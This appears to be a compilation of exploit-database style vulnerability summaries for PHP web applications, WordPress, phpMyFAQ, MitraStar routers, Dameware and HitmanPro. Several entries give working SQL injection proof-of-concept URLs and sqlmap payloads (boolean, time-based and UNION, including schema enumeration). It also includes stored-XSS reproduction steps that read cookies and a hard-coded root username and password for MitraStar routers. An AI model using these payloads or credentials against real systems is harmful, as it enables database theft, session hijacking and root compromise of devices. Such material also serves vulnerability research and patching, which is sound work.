The vulnerability allows an attacker to inject sql commands into the 'city' and 'posted_by' parameters of the searchCommercial.php and searchResidential.php scripts. The payloads for the attack are boolean-based blind, error-based, and AND/OR time-based blind.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/status_list.php?status_id=[SQL] -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+- Parameter: status_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/restaurant-menu.php?resid=[SQL] -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+- Parameter: resid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: resid=-9239 OR 3532=3532# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: resid=539 AND SLEEP(5) Type: UNION query Title: MySQL UNION query (87) - 10 columns Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87#
A PHP Object Injection vulnerability was discovered in the Ultimate Product Catalog plugin version 4.2.24 for WordPress. An attacker can exploit this vulnerability to execute arbitrary code on the server by sending a malicious cookie to the vulnerable function. This vulnerability can be exploited without authentication.
In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php.
In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment. Exploit code is <!DOCTYPE html> <html> <head> <title>XSS EXPLOIT</title> </head> <body> <script>confirm(document.cookie)</script> </body> </html>. Steps to reproduce: 1. Create a user having limited access rights to attachment section 2. Goto http://localhost/phpmyfaq/admin/?action=editentry 2. Upload the exploit code with .html extension at the place of attachements 3. Access the file url generated at /phpmyfaq/attachments/<random_path> 4. Reach to last file using directory traversal and XSS will triage
In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php. Payload Used: ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -
SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us. This give us a shell with root permissions. Note: the password for 1234 user is under the router. You can copy all file system to your local machine using scp. In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root).
A vulnerability in Dameware Remote Controller version 12.0.0.520 allows remote attackers to execute arbitrary code via a crafted packet sent to the listening service on port 6129. The vulnerability is due to improper bounds checking of the packet data, which can result in a buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.
CVE-2017-6008 is a vulnerability in the HitmanPro scan that allows privilege escalation by exploiting a kernel pool buffer overflow. The exploits here use the Quota Process Pointer Overwrite attack as described in the Tarjei Mandt's paper. It also uses the Pool sprayer library. A detailed paper on the Windows 7 exploit is available at https://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/. The Windows 10 version uses another vulnerability in the hitmanpro37.sys driver, an Out-Of-Bounds read, which is used to leak the Pool Cookie. This leak allows us to use the very same attack on Windows 10. A detailed paper of the exploit on Windows 10 is available at https://trackwatch.com/.